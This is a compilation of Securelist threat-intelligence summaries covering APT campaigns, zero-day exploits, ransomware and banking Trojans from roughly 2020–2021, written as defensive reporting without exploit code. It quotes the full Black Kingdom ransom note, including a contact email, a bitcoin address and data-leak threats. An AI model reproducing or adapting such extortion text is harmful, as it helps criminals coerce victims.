In September, we [provided an overview](<https://securelist.com/finspy-unseen-findings/104322/>) of the FinSpy PC implant, covering not only the Windows version, but also Linux and macOS versions. FinSpy is an infamous, commercial surveillance toolset that is used for "legal surveillance" purposes. Historically, several NGOs have repeatedly reported it being used against journalists, political dissidents and human rights activists. Its Windows implant was originally represented by a single-stage spyware installer; and this version was detected and researched several times up to 2018. Since then, we have observed a decreasing detection rate for FinSpy for Windows. While the nature of this anomaly remained unknown, we began detecting some suspicious installer packages backdoored with Metasploit stagers. We were unable to attribute these packages to any threat actor until the middle of 2019 when we found a host that served these installers among FinSpy Mobile implants for Android. Over the course of our investigation, we found out that the backdoored installers are nothing more than first stage implants that are used to download and deploy further payloads before the actual FinSpy Trojan. Apart from the Trojanized installers, we also observed infections involving usage of a UEFI or MBR bootkit.
While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our report.

Towards the end of Q3, we identified a previously unknown payload with advanced capabilities, delivered using two infection chains to various government organizations and telecoms companies in the Middle East. The payload makes use of a Windows kernel-mode rootkit to facilitate some of its activities and is capable of being persistently deployed through an MBR or a UEFI bootkit. Interestingly enough, some of the components observed in this attack have been formerly staged in memory by the Slingshot agent on multiple occasions; Slingshot is a post-exploitation framework that we covered in several cases in the past (not to be confused with the Slingshot APT). It is mainly known for being a proprietary commercial penetration testing toolkit officially designed for red team engagements. However, it's not the first time that attackers appear to have taken advantage of it. One of our previous reports from 2019 covering FruityArmor's activity showed that the threat group used the framework to target organizations across multiple industries in the Middle East, possibly by leveraging an unknown exploit in a messenger app as an infection vector. In a recent private intelligence report, we provided a drill-down analysis of the newly discovered malicious toolkit that we observed in tandem with Slingshot and how it was leveraged in clusters of activity in the wild.
Most notably, we outlined some of the advanced features that are evident in the malware as well as its utilization in a particular long-standing activity against a high-profile diplomatic target in the Middle East.

(Source record: Securelist blog, "APT annual review 2021", published 2021-11-30, https://securelist.com/apt-annual-review-2021/105127/; CVEs referenced: CVE-2021-1732, CVE-2021-28310, CVE-2021-31955, CVE-2021-31956, CVE-2021-40449.)

(Source record: Securelist blog, last seen 2021-08-12.)

## Targeted attacks

### The leap of a Cycldek-related threat actor

It is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous "DLL side-loading triad": a legitimate executable, a malicious DLL to be [side-loaded](<https://attack.mitre.org/techniques/T1574/002/>) by it and an encoded payload,
generally dropped from a self-extracting archive. This was first thought to be a signature of [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>), but we have observed other groups using similar "triads", including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.

We recently described one such file, called "FoundCore", which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)

However, in this case, the shellcode was heavily obfuscated – the technical details were presented in the '[The leap of a Cycldek-related threat actor](<https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/>)' report. We found the loader for this file so interesting that we decided to base one of the tracks of our [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>) course on it.

The final payload is a remote administration tool that provides full control over the victim machine to its operators. Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.

In the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com – all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempting to exploit CVE-2018-0802.
All of these documents were blank, suggesting the existence of precursor documents – possibly delivered by means of spear-phishing or a previous infection – that trigger the download of the RTF files. Successful exploitation leads to the deployment of further malware – named DropPhone and CoreLoader.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)

Our telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.

While Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign – which is why we attribute the campaign, with low confidence, to this threat actor.

### Zero-day vulnerability in Desktop Window Manager used in the wild

While analyzing the [CVE-2021-1732](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, [Microsoft released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) for the new zero-day (CVE-2021-28310) as part of its April security updates.

CVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe).
Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).

The exploit was initially identified by our advanced exploit prevention technology and related detection records. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.

We believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.

You can find technical details on the exploit in the '[Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>)' post. Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).

### Operation TunnelSnake

Windows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets.
Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.

Nevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.

One such example came to our attention during an investigation last year, in which we uncovered a previously unknown and stealthy implant in the networks of regional inter-governmental organizations in Asia and Africa. This rootkit, which we dubbed "Moriya", was used to deploy passive backdoors on public facing servers, facilitating the creation of a covert C2 (Command and Control) communication channel through which they can be silently controlled.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/08151011/Operation_TunnelSnake_01.png>)

This tool was used as part of an ongoing campaign that we named "[TunnelSnake](<https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831/>)". The rootkit was detected on the targeted machines as early as November 2019; and another tool we found, showing significant code overlaps with the rootkit, suggests that the developers had been active since at least 2018.

Since neither the rootkit nor other lateral movement tools that accompanied it during the campaign relied on hardcoded C2 servers, we could gain only partial visibility into the attacker's infrastructure.
However, the bulk of the detected tools, besides Moriya, consist of both proprietary and well-known pieces of malware that were previously in use by Chinese-speaking threat actors, giving a clue to the attacker's origin.

### PuzzleMaker

On April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits.

While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. This EoP exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2), and exploits two distinct vulnerabilities in the Microsoft Windows OS kernel.

On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday.

The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor, which in turn connects to the C2 to get commands.

We weren't able to find any connections or overlaps with a known threat actor, so we tentatively named this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).

### Andariel adds ransomware to its toolset

In April, we discovered a suspicious Word document containing a Korean file name and decoy uploaded to VirusTotal. The document contained an unfamiliar macro and used novel techniques to implant the next payload.
Our telemetry revealed two infection methods used in these attacks, with each payload having its own loader for execution in memory. The threat actor only delivered the final stage payload for selected victims.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15094853/Andariel_delivered_ransomware_01.png>)

During the course of our research, Malwarebytes published a [report](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/>) with technical details about the same series of attacks, which attributed it to the Lazarus group. However, after thorough analysis, we reached the conclusion that the attacks were the work of Andariel, a sub-group of Lazarus, based on code overlaps between the second stage payload in this campaign and previous malware from this threat actor.

Historically, Andariel has mainly targeted organizations in South Korea; and our telemetry suggests that this is also the case in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction sectors.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/15095550/Andariel_delivered_ransomware_08.png>)

We also found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase of an attack. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity.

Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware, underlining the financial motivation of this threat actor.

### Ferocious Kitten

[Ferocious Kitten](<https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/>) is an APT threat actor that has targeted Persian-speaking individuals who appear to be based in Iran.
The group has mostly operated under the radar and, as far as we know, has not been covered by security researchers. The threat actor attracted attention recently when a lure document was uploaded to VirusTotal and went public thanks to [researchers on Twitter](<https://twitter.com/reddrip7/status/1366703445990723585?s=21>). Since then, one of its implants [has been analyzed](<http://www.hackdig.com/03/hack-293629.htm>) by a Chinese threat intelligence firm.

We were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. The malware dropped from the lure document, dubbed "MarkiRAT", records keystrokes, clipboard content, and provides file download and upload capabilities as well as the ability to execute arbitrary commands on the victim's computer. We were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of Telegram and Chrome applications as a persistence method.

Ferocious Kitten is one of the groups that operate in a wider eco-system intended to track individuals in Iran. Such threat groups aren't reported very often; and so are able to re-use infrastructure and toolsets without worrying about them being taken down or flagged by security solutions. Some of the TTPs used by this threat actor are reminiscent of other groups that are active against a similar set of targets, such as Domestic Kitten and Rampant Kitten.

## Other malware

### Evolution of JSWorm ransomware

While ransomware has been around for a long time, it has evolved over time as attackers have improved their technologies and refined their tactics. We have seen a shift away from the random, speculative attacks of five years ago, and even from the massive outbreaks such as [WannaCry](<https://securelist.com/wannacry-faq-what-you-need-to-know-today/78411/>) and [NotPetya](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>).
Many ransomware gangs have switched to the more profitable tactic of "big-game hunting"; and news of ransomware attacks affecting large corporations, and even critical infrastructure installations, has become commonplace. Moreover, there's now a [well-developed eco-system underpinning ransomware attacks](<https://securelist.com/ransomware-world-in-2021/102169/>).

As a result, even though [the number of ransomware attacks has fallen](<https://securelist.com/ransomware-by-the-numbers-reassessing-the-threats-global-impact/101965/>), and individuals are probably less likely to encounter ransomware than a few years ago, the threat to organizations is greater than ever.

We recently published analysis of one such ransomware family, named [JSWorm](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). This malware was discovered in 2019, and since then different variants have gained notoriety under various names such as Nemty, Nefilim, Offwhite and others.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24115814/JSworm_malware_01.png>)

Each "re-branded" version has included alterations to different aspects of the code – file extensions, cryptographic schemes, encryption keys, programming language and distribution model. Since it emerged, JSWorm has developed from a typical mass-scale ransomware threat affecting mostly individual users into a typical big-game hunting ransomware threat attacking high-profile targets and demanding massive ransom payments.

### Black Kingdom ransomware

[Black Kingdom](<https://securelist.com/black-kingdom-ransomware/102873/>) first appeared in 2019; in 2020 the group was observed exploiting vulnerabilities (such as CVE-2019-11510) in its attacks. In recent activity, the ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065, aka [ProxyLogon](<https://proxylogon.com/>)).
This ransomware family is much less sophisticated than other [Ransomware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/ransomware-as-a-service-raas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RaaS) or big game hunting families. The group's involvement in the Microsoft Exchange exploitation campaign suggests opportunism rather than a resurgence in activity from this ransomware family.

The malware is coded in Python and compiled to an executable using PyInstaller. The ransomware supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and the possibility of recovering files that have been encrypted with Black Kingdom with the help of the hardcoded key. At the time of analysis, there was already a [script to recover files encrypted with the embedded key](<https://blog.cyberint.com/black-kingdom-ransomware>).

Black Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard as it does so.

```
***************************
| We Are Back ?
***************************

We hacked your (( Network )), and now all files, documents, images,
databases and other important data are safely encrypted using the strongest algorithms ever.
You cannot access any of your files or services .
But do not worry. You can restore everthing and get back business very soon ( depends on your actions )

before I tell how you can restore your data, you have to know certain things :

We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.

To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )

***************************
| What guarantees ?
***************************

We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free
just send the files you want to decrypt to (support_blackkingdom2@protonmail.com

***************************************************
| How to contact us and recover all of your files ?
***************************************************

The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .


[ + ] Instructions:

1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com

2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :

[ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]

3- confirm your payment by sending the transfer url to our email address

4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,
so that you can recover all your files.

## Note ##

Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.
By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.

Your ID ==>
FDHJ91CUSzXTquLpqAnP
```

After decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>). The group adapted parts of the code, adding features that were not originally present in the builder, such as the hardcoded key.
We were not able to attribute Black Kingdom to any known threat group.

Based on our telemetry, we could see only a few hits by Black Kingdom in Italy and Japan.

### Gootkit: the cautious banking Trojan

[Gootkit](<https://securelist.com/gootkit-the-cautious-trojan/102731/>) belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it's not very common, new versions of the Trojan may remain under the researchers' radar for long periods.

It is complex multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploit kits such as Spelevo and RIG. Alongside spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.

Gootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and lots of other malicious actions. The Trojan's loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.

In 2019, Gootkit stopped operating after it experienced a [data leak](<https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/>), but has been [active again](<https://www.bleepingcomputer.com/news/security/gootkit-malware-returns-to-life-alongside-revil-ransomware/>) since November 2020. Most of the victims are located in EU countries such as Germany and Italy.

### Bizarro banking Trojan expands into Europe

Bizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy.
This malware has been used to steal credentials from customers of 70 banks from different European and South American countries.

As with [Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.

Bizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages and seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.

Bizarro is one of several banking Trojans from South America that have extended their operations into other regions – mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.

### Malicious code in APKPure app

In early April, we [discovered malicious code in version 3.17.18 of the official client of the APKPure app store](<https://securelist.com/apkpure-android-app-store-infected/101845/>), a popular alternative source of Android apps.
[The incident seems to be similar to what happened with CamScanner](<https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/>), when the app's developer implemented an adware SDK from an unverified source.

When launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. In the case of relatively recent versions of the operating system (Android 8 or higher), it loads additional modules for the [Triada Trojan](<https://www.kaspersky.com/blog/triada-trojan/11481/>). If the device is older (Android 6 or 7, and without security updates installed), it could be the [xHelper Trojan](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>).

We reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.

### Browser lockers

Browser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The "locking" consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.

This type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide.
The tricks used by the scammers include imitating the infamous "[Blue Screen of Death](<https://encyclopedia.kaspersky.com/glossary/blue-screen-of-death-bsod/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)" (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.

In our [report on browser lockers](<https://securelist.com/browser-lockers-extortion-disguised-as-a-fine/101735/>), we examined two families of lockers that mimic government websites.

Both families spread mainly via advertising networks, primarily aimed at selling "adult" content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).

These threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don't fall for the cybercriminals' smoke-and-mirrors tactics.

### Malware targets Apple M1 chip

Last November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture.
Unfortunately, just months after the release, [malware writers had already adapted several malware families to the new processor](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).

### Attempted supply-chain attack using PHP

In March, [unknown attackers tried to carry out a supply-chain attack by introducing malicious code to the PHP scripting language](<https://www.kaspersky.com/blog/php-git-backdor/39191/>). The developers of PHP make changes to the code using a common repository built on the Git version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers; PHP is used on around 80 per cent of web servers.

Source: "IT threat evolution Q2 2021", Securelist blog, published 2021-08-12, <https://securelist.com/it-threat-evolution-q2-2021/103597/>. CVEs referenced: CVE-2018-0802, CVE-2019-11510, CVE-2021-1732, CVE-2021-27065, CVE-2021-28310, CVE-2021-31955, CVE-2021-31956.

## Targeted attacks

### MATA: Lazarus's multi-platform targeted malware framework

The more sophisticated threat actors are continually developing their TTPs (Tactics, Techniques and Procedures) and the toolsets they use to compromise the systems of their targets. However, malicious toolsets used to target multiple platforms are rare, because they require significant investment to develop and maintain. In July, we reported the use of an advanced, multi-purpose malware framework developed by the Lazarus group.

We discovered the first artefacts relating to this framework, dubbed 'MATA' (the authors named their infrastructure 'MataNet'), in April 2018. Since then, Lazarus has further developed MATA; and there are now versions for Windows, Linux and macOS operating systems.

The MATA framework consists of several components, including a loader, an orchestrator (which manages and coordinates the processes once a device is infected), a C&C server and various plugins.

Lazarus has used MATA to infiltrate the networks of organizations around the world and steal data from customer databases; and, in at least one case, the group has used it to spread ransomware – you can read more about this in the next section.
The victims have included software developers, Internet providers and e-commerce sites; and we detected traces of the group's activities in Poland, Germany, Turkey, Korea, Japan, and India.

You can read more about MATA [here](<https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/>).

### Lazarus on the hunt for big game

Targeted ransomware has been on the increase in recent years. Typically, such attacks are carried out by criminal groups, who license 'as-a-service' ransomware from third-party malware developers and then distribute it by piggy-backing on established botnets.

However, earlier this year we discovered a new ransomware family linked to the Lazarus APT group. The [VHD ransomware](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>) operates much like other ransomware – it encrypts files on drives connected to the victim's computer and deletes System Volume Information (used as part of the Windows restore point feature) to prevent recovery of data. The malware also suspends processes that could potentially lock important files, such as Microsoft Exchange or SQL Server. However, the delivery mechanism is more reminiscent of APT campaigns. The spreading utility contains a list of administrative credentials and IP addresses specific to the victim, which it uses to brute-force the SMB service on every discovered computer. Whenever it makes a successful connection, a network share is mounted and the VHD ransomware is copied and executed through WMI calls.

While investigating a second incident, we were able to uncover the full infection chain. The malware gained access to a victim's system by exploiting a vulnerable VPN gateway and then obtained administrative rights on the compromised machines.
It used these to install a backdoor and take control of the Active Directory server. Then all computers were infected with the VHD ransomware using a loader created specifically for this task.

Further analysis revealed the backdoor to be part of the MATA framework described above.

### WastedLocker

[Garmin, the GPS and aviation specialist, was the victim of a cyber-attack](<https://www.garmin.com/en-US/outage/>) in July that resulted in the encryption of some of its systems. The malware used in the attack was WastedLocker, and you can read our technical analysis of this ransomware [here](<https://securelist.com/wastedlocker-technical-analysis/97944/>).

This ransomware, the use of which has increased this year, has several noteworthy features. It includes a command line interface that attackers can use to control the way it operates – specifying directories to target and setting a priority of which files to encrypt first; and controlling the encryption of files on specified network resources. WastedLocker also features a bypass for UAC (User Account Control) on Windows computers that allows the malware to silently elevate its privileges using a known bypass technique.

WastedLocker uses a combination of AES and RSA algorithms to encrypt files, which is standard for ransomware families. Files are encrypted using a single public RSA key. This would be a weakness if this ransomware were to be distributed in mass attacks, since a decryptor from one victim would have to contain the only private RSA key that could be used to decrypt the files of all victims. However, since WastedLocker is used in attacks targeted at a specific organization, this weakness cannot be used to build a universal decryptor in real-world scenarios.
Encrypted files are given the extension garminwasted_info and, unusually, a new info file is created for each of the victim's encrypted files.

### CactusPete's updated Bisonal backdoor

CactusPete is a Chinese-speaking APT threat actor that has been active since 2013. The group has typically targeted military, diplomatic and infrastructure victims in Japan, South Korea, Taiwan and the U.S. However, more recently the group has shifted its focus more towards other Asian and Eastern European organizations.

This group, which we would characterize as having medium level technical capabilities, seems to have acquired greater support and has access to more complex code such as ShadowPad, which CactusPete deployed earlier this year against government, defence, energy, mining and telecoms organizations.

Nevertheless, the group continues to use less sophisticated tools. We recently reported the group's use of a [new variant of the Bisonal backdoor](<https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/>) to steal information, execute code on target computers and perform lateral movement within the network. Our research began with a single sample, but using the [Kaspersky Threat Attribution Engine](<https://www.kaspersky.com/enterprise-security/cyber-attack-attribution-tool>) (KTAE) we discovered more than 300 almost identical samples. All of these appeared between March 2019 and April this year – so the group has developed more than 20 samples per month! Bisonal is not advanced, relying instead on social engineering in the form of spear-phishing e-mails.

### Operation PowerFall

Earlier this year our technologies prevented an attack on a South Korean company.
Our investigation uncovered two zero-day vulnerabilities: a remote code execution exploit for Internet Explorer and an elevation of privilege exploit for Windows. The exploits targeted the latest builds of Windows 10 and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build [18363](<https://docs.microsoft.com/en-us/windows/release-information/>) x64.

The exploits operated in tandem. The victim was first targeted with a malicious script that, because of the vulnerability, was able to run in Internet Explorer. Then a flaw in the system service further escalated the privileges of the malicious process. As a result, the attackers were able to move laterally across the target network.

We reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for the elevation of privilege vulnerability (CVE-2020-0986): although, before our discovery, Microsoft hadn't considered exploitation of this vulnerability to be likely. The patch for this vulnerability was released on 9 June. The patch for the remote code vulnerability (CVE-2020-1380) was released on 11 August.

We named this malicious campaign Operation PowerFall. While we have been unable to find a clear link to known threat actors, we believe that DarkHotel might be behind it. You can read more about it [here](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>) and [here](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>).

### The latest activities of Transparent Tribe

Transparent Tribe, a prolific threat actor that has been active since at least 2013, specializes in cyber-espionage.
The group's main malware is a custom .NET Remote Access Trojan (RAT) called Crimson RAT, spread by means of spear-phishing e-mails containing malicious Microsoft Office documents.

During [our investigation into the activities of Transparent Tribe](<https://securelist.com/transparent-tribe-part-1/98127/>), we found around 200 Crimson RAT samples. Kaspersky Security Network (KSN) telemetry indicates that there were more than a thousand victims in the year following June 2019. The main targets were diplomatic and military organizations in India and Pakistan.

Crimson RAT includes a range of functions for harvesting data from infected computers. The latest additions include a server-side component used to manage infected client machines and a USB worm component developed for stealing files from removable drives, spreading across systems by infecting removable media and downloading and executing a thin-client version of Crimson RAT from a remote server.

We also discovered a [new Android implant used by Transparent Tribe](<https://securelist.com/transparent-tribe-part-2/98233/>) to spy on mobile devices. The threat actor used social engineering to distribute the malware, disguised as a fake porn video player and a fake version of the Aarogya Setu COVID-19 tracking app developed by the government of India.

The app is a modified version of the AhMyth Android RAT, open-source malware available on GitHub, which is built by binding a malicious payload inside legitimate apps.
The malware is designed to collect information from the victim's device and send it to the attackers.

### DeathStalker: mercenary cybercrime group

In August, we reported the activities of a cybercrime group that specializes in stealing trade secrets – mainly from fintech companies, law firms, and financial advisors, although we've also seen an attack on a diplomatic entity. The choice of targets suggests that this group, which we have named DeathStalker, is either looking for specific information to sell, or is a mercenary group offering an 'attack on demand' service. The group has been active since at least 2018; but it's possible that the group's activities could go back further, to 2012, and may be linked to the Janicab and Evilnum malware families.

We have seen Powersing-related activities in Argentina, China, Cyprus, Israel, Lebanon, Switzerland, Taiwan, Turkey, the UK and the UAE. We also located Evilnum victims in Cyprus, India, Lebanon, Russia, Jordan and the UAE.

The group's use of a PowerShell implant called Powersing first brought DeathStalker to our attention. The operation starts with spear-phishing e-mails with attached archives containing a malicious LNK file. If the victim clicks on the archive, it starts a convoluted sequence resulting in the execution of arbitrary code on the computer.

Powersing periodically takes screenshots on the victim's computer and sends them to the C2 (Command and Control) server. It also executes additional PowerShell scripts that are downloaded from the C2 server.
So Powersing is designed to provide the attackers with an initial point of presence on the infected computer from which to install additional malware.

DeathStalker camouflages communication between infected computers and the C2 server by using public services as dead drop resolvers: these services allow the attackers to store data at a fixed URL through public posts, comments, user profiles, content descriptions, etc.

DeathStalker offers a good example of what small groups or even skilled individuals can achieve, without the need for innovative tricks or sophisticated methods. DeathStalker should serve as a baseline of what organizations in the private sector should be able to defend against, since groups of this sort represent the type of cyber-threat companies today are most likely to face. We advise defenders to pay close attention to any process creation related to native Windows interpreters for scripting languages, such as powershell.exe and cscript.exe: wherever possible, these utilities should be made unavailable. Security awareness training and security product assessments should also include infection chains based on LNK files.

You can read more about DeathStalker [here](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>).

## Other malware

### The Tetrade: Brazilian banking malware goes global

Brazil has a well-established criminal underground and local malware developers have created many banking Trojans over the years. Typically, this malware is used to target customers of local banks. However, Brazilian cybercriminals are starting to expand their attacks and operations abroad, targeting other countries and banks.
[The Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>) is our designation for four large banking Trojan families that have been created, developed and spread by Brazilian criminals, but which are now being used at a global level. The four malware families are Guildma, Javali, Melcoz and Grandoreiro.

We have seen [attempts to do this before](<https://securelist.com/brazilian-trojans-beyond-borders/30879/>), with limited success using very basic Trojans. The situation is now different. Brazilian banking Trojans have evolved greatly, with hackers adopting techniques for bypassing detection, creating highly modular and obfuscated malware and using a very complex execution flow – making analysis more difficult. Notwithstanding the banking industry's adoption of technologies aimed at protecting customers, including the deployment of plugins, tokens, e-tokens, two-factor authentication and chip-and-PIN credit cards, fraud continues to increase because Brazil still lacks proper cybercrime legislation.

Brazilian criminals are benefiting from the fact that many banks operating in Brazil also have operations elsewhere in Latin America and in Europe, making it easy to extend their attacks to customers of these financial institutions. They are also rapidly creating an ecosystem of affiliates, recruiting cybercriminals to work with in other countries, adopting MaaS (Malware-as-a-Service) and quickly adding new techniques to their malware as a way to keep it relevant and financially attractive to their partners.

The banking Trojan families are seeking to innovate by using DGA (Domain Generation Algorithm), encrypted payloads, process hollowing, DLL hijacking, many LoLBins, fileless infections and other tricks to obstruct analysis and detection.
We believe that these threats will evolve to target more banks in more countries.

